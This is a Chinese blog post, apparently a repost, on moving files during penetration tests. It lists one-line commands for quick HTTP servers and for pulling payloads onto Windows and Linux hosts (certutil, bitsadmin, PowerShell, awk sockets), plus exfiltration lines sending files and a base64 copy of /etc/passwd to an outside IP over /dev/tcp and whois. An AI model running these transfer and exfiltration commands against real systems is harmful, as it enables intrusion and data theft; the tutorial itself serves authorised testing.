渗透测试中的文件传输技巧

最新推荐文章于 2022-09-26 13:20:59 发布
最新推荐文章于 2022-09-26 13:20:59 发布
阅读量615 收藏
点赞数
原文链接:https://paper.seebug.org/834/?from=timeline&isappinstalled=0
版权

前言

在渗透测试中会遇到很多需要进行文件传输的场景,我就结合一些大佬的写几个常用的。

server

php

当php大于5.4的时候,可以使用php在当前目录创建一个简易 http server,监听端口为1337

php -S 0.0.0.0:1337

图片.png

busybox

BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,也可以进行文件传输,但没回显,但是下载成功

busybox httpd -f -p 1337

图片.png

图片.png

ruby

ruby -run -e httpd . -p 1337

图片.png

python2

python -m SimpleHTTPServer 1733

会在当前目录启动http服务,监听端口1733

图片.png

python3

python3 -m http.server 1777

会在当前目录启动http服务,监听端口1777
在这里插入图片描述

Download files from HTTP server

Windows
powershell

下载文件

powershell (new-object System.Net.WebClient).DownloadFile(‘http://192.168.100.197:7878/3.py’,‘e:\java\3.py’);

执行文件

start-process ‘c:\download\a.exe’

certutil下载

certutil -urlcache -split -f http://192.168.100.197:7878/3.py e:\java\3.py

bitsadmin下载

bitsadmin /transfer n http://192.168.100.197:7878/3.py e:\java\3.py

linux

curl

curl http://192.168.100.197:7878/3.py

wget

wget http://192.168.100.197:7878/3.py

awk

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/192.168.100.197/7878"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

使用bash 进行文件传输
使用 Bash /dev/tcp 进行文件传输
接收文件端

nc -lvvp 1337 > aa.py

发送文件端

cat 3.py >/dev/tcp/132.232.75.90/1337

使用 whois 命令进行文件传输

发送文件端

whois -h 132.232.75.90 -p 1337 `cat /etc/passwd | base64`

接受文件端

nc -lvvp 8080

使用ftp传输文
服务端搭建ftp服务
客户端ftp连接

ftp ip

下载文件

get 文件名
参考链接
https://paper.seebug.org/834/?from=timeline&isappinstalled=0

as-root
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
文件上传漏洞——渗透day11
qq_62716256的博客
09-09 642
文件上传漏洞——渗透day11
CobaltStrike4.0渗透测试手册
03-18
《Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具。Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
内网渗透----文件传输
浅笑996的博客
03-08 1410
0x01.Windows目标 1.FTP echo open 192.168.0.23 2121 >> 1.txt //登陆FTP服务器 echo 123>>1.txt //用户名 echo 123>>1.txt
渗透测试常用文件传输方法-Windows篇(如何向Windows服务器上传文件?) (゚益゚メ) 渗透测试
寻觅的博客
04-05 1731
文章目录文件传输certutil 文件传输 文件传输渗透测试主要用于将攻击载荷上传到目标主机或者获取目标资产使用。 certutil certutil是Windows内置的一个证书服务的一部分,其有可以被我们利用的下载模块。 # 显示或删除 URL 缓存项目 -URLCache # 分离嵌入的抽象语法标记1(ASN.1)元素,并保存到文件 -URLCache -split -URLCache -f ...
入侵渗透用到的一些技巧和思路
05-19
以上技巧和思路都是黑客在进行渗透测试时可能会采用的方法,但值得注意的是,这些行为必须在合法授权和合规的前提下进行,否则将构成非法入侵,带来严重的法律后果。在实际操作,应当遵循道德和法律规范,确保网络...
Web渗透测试工程师—初级教程.zip
11-25
理解Web的工作原理对于进行渗透测试至关重要,因为我们需要识别和利用Web应用程序的脆弱性。 第二章:Web组件有哪些? Web组件通常包括Web服务器、数据库、应用程序服务器和客户端浏览器。Web服务器负责接收和...
Android测试文档.rar
01-14
这些文档将帮助你全面理解Android渗透测试,从基础知识到实战技巧,再到安全防护措施,涵盖了一个完整的测试过程。通过深入学习和实践,你可以成为一名合格的Android安全专家,为应用的安全保驾护航。
asp提权笔记大全,渗透遇到的各种问题
12-26
2. **文件包含漏洞**:如果ASP代码存在不安全的文件包含,攻击者可能能够包含并执行服务器上的任意文件,这可能导致权限提升。例如,`(Request.QueryString("file")) %>`。 3. **弱身份验证和会话管理**:不安全...
内网渗透渗透文件传输
weixin_30251587的博客
03-08 535
Linux-UnixlikeOS环境下的 scp命令 适合unixlikeos系统之间 #上传 scp [-r] /locapath/localfile username@target_linux:/remotepath/remotefile # 下载 scp [-r] username@target_linux:/remotepath/remotefile /locapath/localfi...
渗透测试之内网渗透的数据传输
Blood_Pupil的博客
07-01 1596
DNS隧道
渗透学习-文件上传篇-基础知识部分(持续更新
qq_43696276的博客
08-18 1231
文件上传漏洞也是web安全不可忽视的一环,其对于web网站的危害性较大,因为一般如果我们能够上传了对于的webshell并且能够进行执行的话,那我们将能够拿下足够的权限。因此,要想防御好文件上传漏洞,我们就必须先学习如何利用并发现这个漏洞!!!............
参与了音频文件传输的功能测试,我的测试总结
自动化测试馆长
04-05 2548
针对音频文件传输传输文件完整性和正确性的测试,小编做了以下测试总结,希望能对大家以后文件传输类的测试具有一定参考价值。
Web渗透测试----3、文件上传漏洞
七天
12-23 3006
文章目录一、文件上传漏洞二、客户端校验上传文件的方式及绕过2.1、客户端JS验证2.2.1、前端js验证代码2.2.2、绕过前端JS验证三、服务端校验文件上传的方式及绕过3.1、通过文件后缀验证及绕过3.2 、通过文件类型验证及绕过3.3 、通过文件内容验证及绕过3.4、WAF进行校验及绕过3.5、竞争上传绕过3.6、.htaccess文件绕过3.7、根据操作系统特性进行绕过3.8、通过post和get方法绕过3.9、通过文件截断绕过攻击3.10、利用文件包含或解析漏洞绕过上传四、文件上传漏洞的防御总结 .
渗透测试常用文件传输方法-Linux篇(如何向Linux服务器上传文件?) (゚益゚メ) 渗透测试
寻觅的博客
04-04 1193
文章目录攻击机挂载文件Python脚本挂载使用阿帕奇服务挂载传输文件 攻击机挂载文件 Python脚本挂载 # python2 python -m SimpleHTTPServer # python3适用的将当前目标挂载,不填写端口的话默认是到8000端口 python3 -m http.server 端口 #python3.7之后支持指定文件 python -m http.server 端口 --directory 指定文件 # nohup 可以不依赖当前进程(关闭ssh后此进程不会跟随关闭,&
【甄选靶场】Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)
最新发布
人间体佐菲的博客
09-26 1012
Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)信息安全,网络安全,渗透测试
Windows&Linux文件传输方式总结
st3pby的博客
06-18 9987
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。在渗透过程,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件传输方式。Windows在本地或者VPS上搭建FTP服务器,通过简单的FTP命令即可实现文件的上传。常用的FTP命令: 例如,我们可以通过在攻击主机上搭建FTP服务,之后在目标主机上通过cmd下的ftp进行远程连接: 首先,在
渗透测试常用的文件下载方式总结
qq_32660043的博客
02-24 926
那些常见的文件下载姿势总结。
绕过加密爆破:Web登录账号密码的渗透测试策略
本文主要探讨了在网络安全渗透测试,如何应对登录系统账号密码经过JavaScript加密后再传输的情况,提出了四种不同的破解或爆破思路。 一、加密账号密码的传输方式概述 在现代Web应用,为了提高安全性,许多...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值